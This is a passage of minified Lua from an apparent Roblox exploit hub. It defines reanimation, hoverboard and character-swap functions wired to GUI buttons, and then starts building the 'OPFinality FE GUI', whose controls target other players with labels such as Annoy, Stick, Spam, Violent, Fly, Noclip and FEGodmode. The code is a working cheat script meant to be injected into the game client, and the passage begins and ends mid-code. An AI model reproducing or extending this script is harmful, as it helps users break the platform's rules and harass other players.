end;game:GetService('RunService').Stepped:Connect(function()pcall(function()FakeChar:FindFirstChild("Head").CanCollide=false;FakeChar:FindFirstChild("Torso").CanCollide=false;Char.Head.CanCollide=false;Char.Torso.CanCollide=false end)end)game:GetService('RunService').RenderStepped:Connect(function()pcall(function()FakeChar:FindFirstChild("Head").CanCollide=false;FakeChar:FindFirstChild("Torso").CanCollide=false;Char.Head.CanCollide=false;Char.Torso.CanCollide=false end)end)game:GetService('RunService').Heartbeat:Connect(function()pcall(function()FakeChar:FindFirstChild("Head").CanCollide=false;FakeChar:FindFirstChild("Torso").CanCollide=false;Char.Head.CanCollide=false;Char.Torso.CanCollide=false end)end)function died()LocalPlayer.Character=Char;FakeChar:Destroy()Char:BreakJoints()end;function Align(aA,Part0,i,k8)local k9=Instance.new('AlignPosition',aA)k9.Parent.CanCollide=false;k9.ApplyAtCenterOfMass=true;k9.MaxForce=67752;k9.MaxVelocity=math.huge/9e110;k9.ReactionForceEnabled=false;k9.Responsiveness=math.huge;k9.RigidityEnabled=false;local ka=Instance.new('AlignOrientation',aA)ka.MaxAngularVelocity=math.huge/9e110;ka.MaxTorque=67752;ka.PrimaryAxisOnly=false;ka.ReactionTorqueEnabled=false;ka.Responsiveness=math.huge;ka.RigidityEnabled=false;local kb=Instance.new('Attachment',aA)local kc=Instance.new('Attachment',Part0)kc.Orientation=k8;kc.Position=i;k9.Attachment0=kb;k9.Attachment1=kc;ka.Attachment0=kb;ka.Attachment1=kc end;Char.Torso['Right Shoulder']:Destroy()Char.Torso['Left Shoulder']:Destroy()Char.Torso['Right Hip']:Destroy()Char.Torso['Left Hip']:Destroy()Char.HumanoidRootPart['RootJoint']:Destroy()Char.HumanoidRootPart.Anchored=true;Char.Humanoid.PlatformStand=true;FakeChar['Torso'].Position=Char['Torso'].Position;for T,v in pairs(Char:GetChildren())do if v:IsA("Part")and v.Name~="Head"then if v.Name=="Torso"then Align(Char[v.Name],FakeChar[v.Name],Vector3.new(0,0.5,0),Vector3.new(0,0,0))else Align(Char[v.Name],FakeChar[v.Name],Vector3.new(0,0,0),Vector3.new(0,0,0))end end end;FakeChar.Humanoid.Died:Connect(died)Char.Humanoid.Died:Connect(died)LocalPlayer.Character=FakeChar end)end;function Clickey19()pcall(function()local Player=game:GetService("Players").LocalPlayer;local Character=Player.Character;local R={Skateboard=Character:WaitForChild("MeshPartAccessory")}for T,v in next,R do v.Handle.AccessoryWeld:Remove()end;rs=game:GetService("Players").LocalPlayer.Character.Torso["Right Shoulder"]:Clone()game:GetService("Players").LocalPlayer.Character.Torso["Right Shoulder"]:Destroy()rs.Parent=game:GetService("Players").LocalPlayer.Character.Torso;rs.Part0=game:GetService("Players").LocalPlayer.Character.Torso;rs.Part1=game:GetService("Players").LocalPlayer.Character["Right Arm"]:Clone()game:GetService("Players").LocalPlayer.Character["Right Arm"].Name="ra"rs.Part1.Parent=game:GetService("Players").LocalPlayer.Character;local dn=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["Right Arm"])local dp=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["ra"])local dq=Instance.new("HingeConstraint",game:GetService("Players").LocalPlayer.Character["Right Arm"])dq.Attachment0=dn;dq.Attachment1=dp;dq.LimitsEnabled=true;dq.LowerAngle=0;dq.Restitution=0;dq.UpperAngle=0;ls=game:GetService("Players").LocalPlayer.Character.Torso["Left Shoulder"]:Clone()game:GetService("Players").LocalPlayer.Character.Torso["Left Shoulder"]:Destroy()ls.Parent=game:GetService("Players").LocalPlayer.Character.Torso;ls.Part0=game:GetService("Players").LocalPlayer.Character.Torso;ls.Part1=game:GetService("Players").LocalPlayer.Character["Left Arm"]:Clone()game:GetService("Players").LocalPlayer.Character["Left Arm"].Name="la"ls.Part1.Parent=game:GetService("Players").LocalPlayer.Character;local dn=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["Left Arm"])local dp=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["la"])local dq=Instance.new("HingeConstraint",game:GetService("Players").LocalPlayer.Character["Left Arm"])dq.Attachment0=dn;dq.Attachment1=dp;dq.LimitsEnabled=true;dq.LowerAngle=0;dq.Restitution=0;dq.UpperAngle=0;rh=game:GetService("Players").LocalPlayer.Character.Torso["Right Hip"]:Clone()game:GetService("Players").LocalPlayer.Character.Torso["Right Hip"]:Destroy()rh.Parent=game:GetService("Players").LocalPlayer.Character.Torso;rh.Part0=game:GetService("Players").LocalPlayer.Character.Torso;rh.Part1=game:GetService("Players").LocalPlayer.Character["Right Leg"]:Clone()game:GetService("Players").LocalPlayer.Character["Right Leg"].Name="rh"rh.Part1.Parent=game:GetService("Players").LocalPlayer.Character;local dn=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["Right Leg"])local dp=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["rh"])local dq=Instance.new("HingeConstraint",game:GetService("Players").LocalPlayer.Character["Right Leg"])dq.Attachment0=dn;dq.Attachment1=dp;dq.LimitsEnabled=true;dq.LowerAngle=0;dq.Restitution=0;dq.UpperAngle=0;lh=game:GetService("Players").LocalPlayer.Character.Torso["Left Hip"]:Clone()game:GetService("Players").LocalPlayer.Character.Torso["Left Hip"]:Destroy()lh.Parent=game:GetService("Players").LocalPlayer.Character.Torso;lh.Part0=game:GetService("Players").LocalPlayer.Character.Torso;lh.Part1=game:GetService("Players").LocalPlayer.Character["Left Leg"]:Clone()game:GetService("Players").LocalPlayer.Character["Left Leg"].Name="lh"lh.Part1.Parent=game:GetService("Players").LocalPlayer.Character;local dn=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["Left Leg"])local dp=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["lh"])local dq=Instance.new("HingeConstraint",game:GetService("Players").LocalPlayer.Character["Left Leg"])dq.Attachment0=dn;dq.Attachment1=dp;dq.LimitsEnabled=true;dq.LowerAngle=0;dq.Restitution=0;dq.UpperAngle=0;game:GetService("Players").LocalPlayer.Character.Humanoid.HipHeight=10;wait(0.20)local ik=setmetatable({},{__index=function(t,T)return game:service(T)or nil end})local Mouse=Player:GetMouse()local t6=Character:findFirstChild("Humanoid")local Backpack=Player:WaitForChild("Backpack")local Mouse=Player:GetMouse()local Count=false;local t7=0;local t8=false;local t9="Standby"ScriptData={Colors={Base="Grey",Trim="White"},Surfaces={"Top","Bottom","Left","Right","Front","Back"},Rotation=0,Rotors={},Keys={W=false,A=false,S=false,D=false,Space=false},Lift=2,TurnAngle=0,Last=0,Acceleration=0}for U,v in pairs(Character:children())do if v.Name=="Hover"then v:Destroy()end end;local ta=Instance.new("Model",Character)ta.Name="Hover"local function CreatePart(tb,tc,td,te,tf,tg,th)local ti=Instance.new("Part",tc)ti.Name=tb;ti.formFactor=3;ti.Anchored=false;ti.CanCollide=false;ti.Locked=true;ti.Transparency=1;ti.BrickColor=BrickColor.new(tg)ti.Size=Vector3.new(td,te,tf)ti.Material=th;for U,dA in pairs(ScriptData.Surfaces)do ti[dA.."Surface"]=10 end;ti:BreakJoints()Instance.new("BlockMesh",ti).Name="Mesh"return ti end;local function UD(a,b)return UDim2.new(a,0,b,0)end;local function tj(tk)return coroutine.resume(coroutine.create(tk))end;local function CreateWeld(tb,tc,aA,Part0,rb,tl)local tm=Instance.new("Weld",tc)tm.Name=tb;tm.Part1=aA;tm.Part0=Part0;tm.C1=tl;tm.C0=rb;return tm end;local function lerp(a,b,c)return a+(b-a)*c end;local function tn(dG,qw,qx)local bV={dG.X,dG.Y,dG.Z,dG:toEulerAnglesXYZ()}local bW={qw.X,qw.Y,qw.Z,qw:toEulerAnglesXYZ()}for T,v in pairs(bV)do bV[T]=lerp(v,bW[T],qx)end;return CFrame.new(bV[1],bV[2],bV[3])*CFrame.Angles(select(4,unpack(bV)))end;local t9="None"local Head=Character:findFirstChild("Head")local Torso=Character:findFirstChild("Torso")local to=Character:findFirstChild("HumanoidRootPart")local tp=Instance.new("Model",ta)tp.Name="Motors"local tq={"Left","Right"}local tr={Character["Left Arm"],Character["Right Arm"]}local ts={Character["Left Leg"],Character["Right Leg"]}local tt={ArmW={Left=Instance.new("Weld",tp),Right=Instance.new("Weld",tp)},LegW={Left=Instance.new("Weld",tp),Right=Instance.new("Weld",tp)},HeadW={Middle=Instance.new("Weld",tp)}}local tu={ArmW={Left=Torso["Left Shoulder"],Right=Torso["Right Shoulder"]},LegW={Left=Torso["Left Hip"],Right=Torso["Right Hip"]},HeadW={Middle=Torso["Neck"]}}local LA,RA=tt.ArmW.Left,tt.ArmW.Right;local LL,tv=tt.LegW.Left,tt.LegW.Right;local tw=tt.HeadW.Middle;local tx=CFrame.new(-1.5,0.5,0)local RAD=CFrame.new(1.5,0.5,0)local ty=CFrame.new(0,-0.8,0)tt.ArmW.Left.C1,tt.ArmW.Left.C0,tt.ArmW.Left.Part0=CFrame.new(0,0.5,0),CFrame.new(-1.5,0.5,0),Torso;tt.ArmW.Right.C1,tt.ArmW.Right.C0,tt.ArmW.Right.Part0=CFrame.new(0,0.5,0),CFrame.new(1.5,0.5,0),Torso;tt.LegW.Left.C1,tt.LegW.Left.Part0=CFrame.new(.5,2,0),Torso;tt.LegW.Right.C1,tt.LegW.Right.Part0=CFrame.new(-.5,2,0),Torso;tt.HeadW.Middle.C1,tt.HeadW.Middle.Part0=CFrame.new(0,-1.5,0),Torso;local tz=function(tA,tB)local tC=nil;local Weld=nil;local tD=nil;for U,dA in pairs(tq)do if tA:lower()==dA:lower()then for U,r8 in pairs(tr)do if r8.Name:lower():find(tA:lower())then tC=r8;Weld=tt.ArmW[dA]tD=tu.ArmW[dA]end end end end;if tC and Weld and tD then if tB then Weld.Part1=tC;tD.Part1=nil elseif not tB then Weld.Part1=nil;tD.Part1=tC else print("Error")end end end;local tE=function(tA,tB)local tF=nil;local Weld=nil;local tD=nil;for U,dA in pairs(tq)do if tA:lower()==dA:lower()then for U,r8 in pairs(ts)do if r8.Name:lower():find(tA:lower())then tF=r8;Weld=tt.LegW[dA]tD=tu.LegW[dA]end end end end;if tF and Weld and tD then if tB then Weld.Part1=tF;tD.Part1=nil elseif not tB then Weld.Part1=nil;tD.Part1=tF else print("Error")end end end;local tG=function(tB)local Head=nil;local Weld=nil;local tD=nil;Head=Character["Head"]Weld=tt.HeadW.Middle;tD=tu.HeadW.Middle;if Head and Weld and tD then if tB then Weld.Part1=Head;tD.Part1=nil elseif not tB then Weld.Part1=nil;tD.Part1=Head else print("Error")end end end;local function tH(tI)return math.floor(tI+.5)end;local tJ=CreatePart("Part",ta,1.5,0.25,4,ScriptData.Colors.Base,"SmoothPlastic")local tK=CreatePart("Part",ta,1.505,0.2,3.995,ScriptData.Colors.Trim,"Neon")local tL=CreateWeld("Weld",tK,tK,tJ,CFrame.new(0,0,0),CFrame.Angles(0,0,0))local tM=CreatePart("Part",ta,0.2,0.2,0.2,ScriptData.Colors.Base,"SmoothPlastic")tM.Transparency=1;tM.CanCollide=false;local tN=CreateWeld("Weld",tM,tM,tJ,CFrame.new(0,-0.1,3),CFrame.Angles(math.rad(90),0,0))local tO=CreatePart("Part",ta,0.2,0.2,0.2,ScriptData.Colors.Base,"SmoothPlastic")tO.Transparency=1;tO.CanCollide=false;local tP=CreateWeld("Weld",tO,tO,tJ,CFrame.new(0,-0.1,-3),CFrame.Angles(math.rad(90),0,0))local tQ=Instance.new("BodyPosition",tJ)tQ.maxForce=Vector3.new(1e5,1e5,1e5)local tR=Instance.new("BodyGyro",tJ)tR.maxTorque=Vector3.new(1,1,1)/0;local tS=Instance.new("BodyForce",tJ)tS.force=Vector3.new()if Torso and t6 and tJ then t6.PlatformStand=true;Torso.CFrame=Torso.CFrame*CFrame.new(0,2,0)local tT=CreateWeld("Weld",Torso,Torso,tJ,CFrame.new(0,3,0),CFrame.Angles(0,math.rad(90),0))end;local function tU(CF,tV)local s2=CreatePart("Part",ta,0.4,0.2,0.4,"Black","SmoothPlastic")s2:ClearAllChildren()Instance.new("CylinderMesh",s2).Scale=Vector3.new(1,1,1)local tW=Instance.new("ParticleEmitter",s2)tW.Enabled=true;tW.Name="Realism"tW.Acceleration=Vector3.new(0.5,0.5,0.5)tW.Transparency=NumberSequence.new(0.5,0.8)tW.Rate=NumberRange.new(1)local tX=CreateWeld("Weld",s2,s2,tJ,CF,tV)local tY=s2:Clone()tY.Parent=ta;tY.Size=Vector3.new(1,1,1)tY.Transparency=1;local tZ=CreateWeld("Weld",tY,tY,s2,CFrame.new(0,0,0),CFrame.Angles(0,0,0))table.insert(ScriptData.Rotors,tZ)for T=0,360,45 do local Part=CreatePart("Part",ta,1,0.25,0.25,ScriptData.Colors.Base,"SmoothPlastic")local t_=CreateWeld("Weld",Part,Part,s2,CFrame.Angles(0,math.rad(T),0)*CFrame.new(0,0,1.08),CFrame.Angles(0,0,0))local u0=CreatePart("Part",ta,1,0.2,0.2,ScriptData.Colors.Trim,"Neon")local u1=CreateWeld("Weld",u0,u0,Part,CFrame.new(0,0,0.05),CFrame.Angles(0,0,0))end;for T=0,360,45 do local u2=CreatePart("Part",ta,2,0.2,0.25,"White","SmoothPlastic")u2:findFirstChild("Mesh").Scale=Vector3.new(1,0.125,1)local RW=CreateWeld("Weld",u2,u2,tY,CFrame.Angles(0,math.rad(T),0)*CFrame.new(0,0,0.2),CFrame.Angles(math.rad(-20),0,0))end end;ik.RunService.Stepped:connect(function()pcall(function()for U,v in pairs(ScriptData.Rotors)do if v and v.Parent then v.C0=v.C0*CFrame.Angles(0,math.rad(10),0)end end end)a,b=ypcall(function()if tJ and Torso and tQ and tR and tM and tO then local u3=Ray.new(tM.CFrame.p,tM.CFrame.lookVector*(ScriptData.Lift+4+(ScriptData.Keys.Space==true and 5 or 0)))local j,eS=ik.Workspace:findPartOnRay(u3,Character)local u4=Ray.new(tO.CFrame.p,tO.CFrame.lookVector*(ScriptData.Lift+4+(ScriptData.Keys.Space==true and 5 or 0)))local u5,u6=ik.Workspace:findPartOnRay(u4,Character)local u7,u8,u9,ua,ub,uc=0,0,0,0,0,0;local Face=tJ.CFrame.lookVector;if ScriptData.Keys.A==true then u7=1 elseif ScriptData.Keys.D==true then u8=-1 end;if ScriptData.Keys.Space==true then ub=5 else ub=0 end;if ScriptData.Keys.S==true then ua,ScriptData.Last=-2,-1;ScriptData.Acceleration=ScriptData.Acceleration>=8 and 8 or ScriptData.Acceleration+0.1 elseif ScriptData.Keys.W==true then u9,ScriptData.Last=2,1;ScriptData.Acceleration=ScriptData.Acceleration>=8 and 8 or ScriptData.Acceleration+0.1 elseif ScriptData.Acceleration~=0 and not ScriptData.Keys.S==true and not ScriptData.Keys.W==true then ScriptData.Acceleration=ScriptData.Acceleration>0 and ScriptData.Acceleration-0.1 or 0;uc=ScriptData.Last end;ScriptData.TurnAngle=ScriptData.TurnAngle-math.pi*(u7+u8)/32;tR.cframe=CFrame.new()*CFrame.Angles(0,-ScriptData.TurnAngle,(u7+u8)/2)*CFrame.Angles(-((u9+ua)/5),0,0)if j and j:IsA("BasePart")or u5 and u5:IsA("BasePart")then local r8=0;local r9=0;if j then r8=j.CFrame.Y+j.Size.Y/2 end;if u5 then r9=u5.CFrame.Y+u5.Size.Y/2 end;tQ.maxForce=Vector3.new(1e5,1e5,1e5)tQ.position=Vector3.new(tJ.CFrame.X,(r8+r9)/2+ScriptData.Lift+ub,tJ.CFrame.Z)+Vector3.new(Face.X,0,Face.Z)*ScriptData.Acceleration*(u9+ua+uc)else tQ.maxForce=Vector3.new(1e5,0,1e5)tQ.position=Vector3.new(tJ.CFrame.X,tJ.CFrame.Y,tJ.CFrame.Z)+Vector3.new(Face.X,ub,Face.Z)*ScriptData.Acceleration*(u9+ua+uc)end end end)if not a then print("E: "..b)end end)tj(function()while true do for T=0,10,0.1 do ScriptData.Lift=ScriptData.Lift+math.sin(math.pi*2/10*T)*0.1;wait(0.02)end end end)Mouse.KeyDown:connect(function(n_)if n_=="w"then ScriptData.Keys.W=true end;if n_=="a"then ScriptData.Keys.A=true end;if n_=="s"then ScriptData.Keys.S=true end;if n_=="d"then ScriptData.Keys.D=true end;if n_:byte()==32 then ScriptData.Keys.Space=true end end)Mouse.KeyUp:connect(function(n_)if n_=="w"then ScriptData.Keys.W=false end;if n_=="a"then ScriptData.Keys.A=false end;if n_=="s"then ScriptData.Keys.S=false end;if n_=="d"then ScriptData.Keys.D=false end;if n_:byte()==32 then ScriptData.Keys.Space=false end end)tz("Left",true)tz("Right",true)tE("Left",true)tE("Right",true)tG(true)ik.RunService.RenderStepped:connect(function()if t8 then if t7>=1 then t8=false end;t7=t7+1/100 else if t7<=0 then t8=true end;t7=t7-1/100 end;if t9=="None"then LA.C0=tx*CFrame.Angles(math.rad(10*t7),0,math.rad(-20))RA.C0=RAD*CFrame.Angles(math.rad(-10*t7),0,math.rad(20))LL.C0=CFrame.new()*CFrame.Angles(0,0,math.rad(-5))tv.C0=CFrame.new()*CFrame.Angles(0,0,math.rad(5))end end)for T,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren())do if v.Name=="rh"then v.Transparency=1 end end;for T,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren())do if v.Name=="lh"then v.Transparency=1 end end;for T,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren())do if v.Name=="ra"then v.Transparency=1 end end;for T,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren())do if v.Name=="la"then v.Transparency=1 end end;Character.Head.Transparency=0;Character.Torso.Transparency=0;Character["Right Arm"].Transparency=0;Character["Left Arm"].Transparency=0;Character["Right Leg"].Transparency=0;Character["Left Leg"].Transparency=0;local function W(T,v)local X=Instance.new("Attachment",T)X.Position=Vector3.new(0,0,0)local Y=Instance.new("Attachment",v)Y.Position=Vector3.new(0,0,0)local Z=Instance.new("AlignPosition",T)Z.Attachment0=X;Z.Attachment1=Y;Z.RigidityEnabled=false;Z.ReactionForceEnabled=false;Z.ApplyAtCenterOfMass=true;Z.MaxForce=9999999;Z.MaxVelocity=math.huge;Z.Responsiveness=65;local _=Instance.new("AlignOrientation",T)_.Attachment0=X;_.Attachment1=Y;_.ReactionTorqueEnabled=true;_.PrimaryAxisOnly=false;_.MaxTorque=9999999;_.MaxAngularVelocity=math.huge;_.Responsiveness=50 end;W(R.Skateboard.Handle,Character["Torso"])R.Skateboard.Handle.Attachment.Rotation=Vector3.new(90,45,0)Character:WaitForChild("Torso"):FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Torso").Attachment1.Position=Vector3.new(0,-3,0)end)end;function Clickey20()pcall(function()local Player=game:GetService("Players").LocalPlayer;local Character=Player.Character;local L=game:GetService("Players").LocalPlayer.Name;local M=workspace:WaitForChild(L)local R={rightarm=Character:WaitForChild("Hat1"),leftarm=Character:WaitForChild("Pal Hair"),rightleg=Character:WaitForChild("LavanderHair"),leftleg=Character:WaitForChild("Pink Hair"),torso=Character:WaitForChild("Meshes/CrescentHornsAccessory")}local S={head=Character:WaitForChild("Hollow")}for T,v in next,R do v.Handle.AccessoryWeld:Remove()for U,V in next,v:GetDescendants()do if V:IsA("Mesh")or V:IsA("SpecialMesh")then V:Remove()end end end;for T,v in next,S do v.Handle.AccessoryWeld:Remove()end;local function W(T,v)local X=Instance.new("Attachment",T)X.Position=Vector3.new(0,0,0)local Y=Instance.new("Attachment",v)Y.Position=Vector3.new(0,0,0)local Z=Instance.new("AlignPosition",T)Z.Attachment0=X;Z.Attachment1=Y;Z.RigidityEnabled=false;Z.ReactionForceEnabled=false;Z.ApplyAtCenterOfMass=true;Z.MaxForce=9999999;Z.MaxVelocity=math.huge;Z.Responsiveness=2500;local _=Instance.new("AlignOrientation",T)_.Attachment0=X;_.Attachment1=Y;_.ReactionTorqueEnabled=true;_.PrimaryAxisOnly=false;_.MaxTorque=9999999;_.MaxAngularVelocity=math.huge;_.Responsiveness=2500 end;char=game:GetService("Players").LocalPlayer.Character;plr=game:GetService("Players").LocalPlayer;char.Archivable=true;bg2=char:Clone()bg2.Archivable=false;bg2.Name="Trash"bg2.Parent=char;game:GetService("Players").LocalPlayer.Chatted:connect(function(P)if P=="swap"then game:GetService("Players").LocalPlayer.Character=Character.Trash;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character end;if P=="back"then game:GetService("Players").LocalPlayer.Character=M;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character end end)W(R.torso.Handle,Character.Trash["Torso"])W(S.head.Handle,Character.Trash["Head"])W(R.rightarm.Handle,Character.Trash["Right Arm"])W(R.leftarm.Handle,Character.Trash["Left Arm"])W(R.rightleg.Handle,Character.Trash["Right Leg"])W(R.leftleg.Handle,Character.Trash["Left Leg"])R.torso.Handle.Attachment.Rotation=Vector3.new(0,0,0)S.head.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.rightarm.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.leftarm.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.rightleg.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.leftleg.Handle.Attachment.Rotation=Vector3.new(90,0,0)for U,c in pairs(bg2:GetChildren())do if c:IsA('Accessory')then c:Destroy()end end;coroutine.resume(coroutine.create(function()while true do wait(0.1)bg2["Head"].Transparency=1;bg2["Left Arm"].Transparency=1;bg2["Left Leg"].Transparency=1;bg2["Right Leg"].Transparency=1;bg2["Right Arm"].Transparency=1;bg2["Torso"].Transparency=1;bg2.Head.face.Transparency=1 end end))end)end;script.Parent.Home.main.Fun.Horse.MouseButton1Click:connect(Clickey1)script.Parent.Home.main.Fun.Tiddies.MouseButton1Click:connect(Clickey2)script.Parent.Home.main.Fun.Box.MouseButton1Click:connect(Clickey3)script.Parent.Home.main.Fun.Suicide.MouseButton1Click:connect(Clickey4)script.Parent.Home.main.Fun.Baby.MouseButton1Click:connect(Clickey5)script.Parent.Home.main.Fun.Vroomer.MouseButton1Click:connect(Clickey6)script.Parent.Home.main.Fun.Neko.MouseButton1Click:connect(Clickey7)script.Parent.Home.main.Fun["Cat Neko"].MouseButton1Click:connect(Clickey8)script.Parent.Home.main.Titan["Internal War"].MouseButton1Click:connect(Clickey9)script.Parent.Home.main.Titan.Spider.MouseButton1Click:connect(Clickey10)script.Parent.Home.main.Titan.Coomslayer.MouseButton1Click:connect(Clickey11)script.Parent.Home.main.Titan.BSHorse.MouseButton1Click:connect(Clickey12)script.Parent.Home.main.Titan["Toxic Titan"].MouseButton1Click:connect(Clickey13)script.Parent.Home.main.Titan.Turret.MouseButton1Click:connect(Clickey14)script.Parent.Home.main.Audio.Tail.MouseButton1Click:connect(Clickey15)script.Parent.Home.main.Audio.Tail2.MouseButton1Click:connect(Clickey16)script.Parent.Home.main.Audio.Circle.MouseButton1Click:connect(Clickey17)script.Parent.Home.main.Utility.AnimBypass.MouseButton1Click:connect(Clickey18)script.Parent.Home.main.Utility.Hoverboard.MouseButton1Click:connect(Clickey19)script.Parent.Home.main.Utility.Rig.MouseButton1Click:connect(Clickey20)local eq=nil;local ud=nil;local ue={}local uf={}local plr=game:GetService("Players").LocalPlayer;local bg=plr.Character;local hum=bg.Humanoid;local ug=2;local run=false;function Clickey21()pcall(function()ug=tonumber(script.Parent.anims.main.boxes.Speed.Text)end)end;function Clickey22()pcall(function()run=false;bg=nil;local ue=nil;local uf=nil;wait(0.25)bg=plr.Character;local ue={}local uf={}run=true;bro=false;eq=tonumber(script.Parent.anims.main.boxes.ID.Text)ud=game:GetObjects('rbxassetid://'..tostring(eq))[1]for T,v in pairs(ud:GetChildren())do table.insert(uf,v.Time)ue[v.Time]={}for ax,b in pairs(v:GetDescendants())do b.Parent=v;table.insert(ue[v.Time],b)end end;function swait(uh)if uh>1 then for T=1,uh do game:GetService("RunService").Heartbeat:Wait()end elseif uh==1 then game:GetService("RunService").Heartbeat:Wait()elseif uh==0 then game:GetService("RunService").RenderStepped:Wait()end end;spawn(function()hum.Died:Connect(function()run=false;print'stop'end)end)while run do for T,v in pairs(uf)do swait(ug)for ax,b in pairs(ue[v])do if b.Name=='Left Leg'then bg.Torso['Left Hip'].Transform=b.CFrame end;if b.Name=='Right Leg'then bg.Torso['Right Hip'].Transform=b.CFrame end;if b.Name=='Left Arm'then bg.Torso['Left Shoulder'].Transform=b.CFrame end;if b.Name=='Right Arm'then bg.Torso['Right Shoulder'].Transform=b.CFrame end;if b.Name=='Torso'then bg.HumanoidRootPart['RootJoint'].Transform=b.CFrame end;if b.Name=='Head'then bg.Torso['Neck'].Transform=b.CFrame end end end end end)end;script.Parent.anims.main.Speedchange.MouseButton1Click:connect(Clickey21)script.Parent.anims.main.Play.MouseButton1Click:connect(Clickey22) end }) GUIS:AddButton({ Title = "OPFinality", Description = "OPFinality FE GUI", Callback = function() wait(0.3) OPFinality = Instance.new("ScreenGui") MainFrame = Instance.new("Frame") TopFrame = Instance.new("Frame") CloseGUI = Instance.new("TextButton") MenuEnterFrame = Instance.new("Frame") Title = Instance.new("TextLabel") OpenMenu = Instance.new("ImageButton") Pages = Instance.new("Frame") Information = Instance.new("Frame") Image_FE_ENABLED = Instance.new("ImageLabel") Text_FE_ENABLED = Instance.new("TextLabel") WhatIsOPFinality = Instance.new("TextLabel") Text_FE_DISABLED = Instance.new("TextLabel") OPFin_Description = Instance.new("TextLabel") OPFin_Warning = Instance.new("TextLabel") Info_Bar = Instance.new("Frame") Info_Background = Instance.new("Frame") Warning_Bar = Instance.new("Frame") Warning_Background = Instance.new("Frame") Info_Image = Instance.new("ImageLabel") Image_FE_DISABLED = Instance.new("ImageLabel") Warn_Image = Instance.new("ImageLabel") Others_1 = Instance.new("Frame") OthersTitle = Instance.new("TextLabel") Char_Image = Instance.new("ImageLabel") OthersText = Instance.new("TextLabel") TXTBOX_PlrName = Instance.new("TextBox") othersBaseBackground = Instance.new("Frame") TeleportTo = Instance.new("TextButton") Annoy = Instance.new("TextButton") Follow = Instance.new("TextButton") View = Instance.new("TextButton") Orbit = Instance.new("TextButton") HeadWalk = Instance.new("TextButton") Stick = Instance.new("TextButton") Spam = Instance.new("TextButton") Carpet = Instance.new("TextButton") Others_toPAGE2 = Instance.new("TextButton") Character_toPAGE2_IMAGE = Instance.new("ImageLabel") Character_2 = Instance.new("Frame") CharacterTitle = Instance.new("TextLabel") CharacterText = Instance.new("TextLabel") Animations_SPOOKY = Instance.new("Frame") spookytitle = Instance.new("TextLabel") headthrow = Instance.new("TextButton") armsoff = Instance.new("TextButton") loophead = Instance.new("TextButton") levitate = Instance.new("TextButton") headfloat = Instance.new("TextButton") Character_backPAGE1 = Instance.new("TextButton") Character_toPAGE1_IMAGE = Instance.new("ImageLabel") Animations_DANCE = Instance.new("Frame") dancetitle = Instance.new("TextLabel") normal = Instance.new("TextButton") movingdance = Instance.new("TextButton") insane = Instance.new("TextButton") happy = Instance.new("TextButton") spindance = Instance.new("TextButton") Animations_HEROIC = Instance.new("Frame") heroictitle = Instance.new("TextLabel") swordstrike = Instance.new("TextButton") jumpland = Instance.new("TextButton") punches = Instance.new("TextButton") swing = Instance.new("TextButton") crawl = Instance.new("TextButton") Char2_Image = Instance.new("ImageLabel") Character_1 = Instance.new("Frame") CharacterTitle_2 = Instance.new("TextLabel") Char_Image_2 = Instance.new("ImageLabel") CharacterText_2 = Instance.new("TextLabel") TXTBOX_Stats = Instance.new("TextBox") BackGroundChar = Instance.new("Frame") HipHeight = Instance.new("TextButton") JumpHeight = Instance.new("TextButton") Speed = Instance.new("TextButton") TXTBOX_Chat = Instance.new("TextBox") BackGroundChar2 = Instance.new("Frame") Chat = Instance.new("TextButton") Spam_2 = Instance.new("TextButton") BackGroundChar3 = Instance.new("Frame") Noclip = Instance.new("TextButton") Fly = Instance.new("TextButton") Character_toPAGE2 = Instance.new("TextButton") Character_toPAGE2_IMAGE_2 = Instance.new("ImageLabel") Others_2 = Instance.new("Frame") OthersTitle_2 = Instance.new("TextLabel") Other_Image2 = Instance.new("ImageLabel") OthersText_2 = Instance.new("TextLabel") TXTBOX_PlrName2 = Instance.new("TextBox") othersBaseBackground2 = Instance.new("Frame") Flatten = Instance.new("TextButton") AimHead = Instance.new("TextButton") Float = Instance.new("TextButton") Multiple = Instance.new("TextButton") Animated = Instance.new("TextButton") SlowAttract = Instance.new("TextButton") WeirdOrbit = Instance.new("TextButton") Violent = Instance.new("TextButton") Max = Instance.new("TextButton") Others_toPAGE3 = Instance.new("TextButton") Character_toPAGE3_IMAGE = Instance.new("ImageLabel") Others_backPAGE1 = Instance.new("TextButton") Character_toPAGE1_IMAGE_2 = Instance.new("ImageLabel") Extra_1 = Instance.new("Frame") Extra_Image = Instance.new("ImageLabel") ExtraText = Instance.new("TextLabel") ExtraBaseBackGround1 = Instance.new("Frame") CrouchRocket = Instance.new("TextButton") ExtraBaseBackGround1Side = Instance.new("Frame") CloneIllusion = Instance.new("TextButton") CoolSpin = Instance.new("TextButton") JumpRocket = Instance.new("TextButton") Extra_toPAGE2 = Instance.new("TextButton") Character_toPAGE2_IMAGE_3 = Instance.new("ImageLabel") Extra_Title = Instance.new("TextLabel") ExtraBaseBackGround2 = Instance.new("Frame") NoLimbs = Instance.new("TextButton") FEGodmode = Instance.new("TextButton") BrickHats = Instance.new("TextButton") RapidPunch = Instance.new("TextButton") ExtraBaseBackGround2Side = Instance.new("Frame") ExtraBaseBackGround3 = Instance.new("Frame") PunchFollow = Instance.new("TextButton") ArmFollow = Instance.new("TextButton") Spin = Instance.new("TextButton") Faint = Instance.new("TextButton") ExtraBaseBackGround3Side = Instance.new("Frame") Extra_2 = Instance.new("Frame") Extra_Image_2 = Instance.new("ImageLabel") ExtraText_2 = Instance.new("TextLabel") Extra_Title_2 = Instance.new("TextLabel") ExtraBaseBackGround2_2 = Instance.new("Frame") 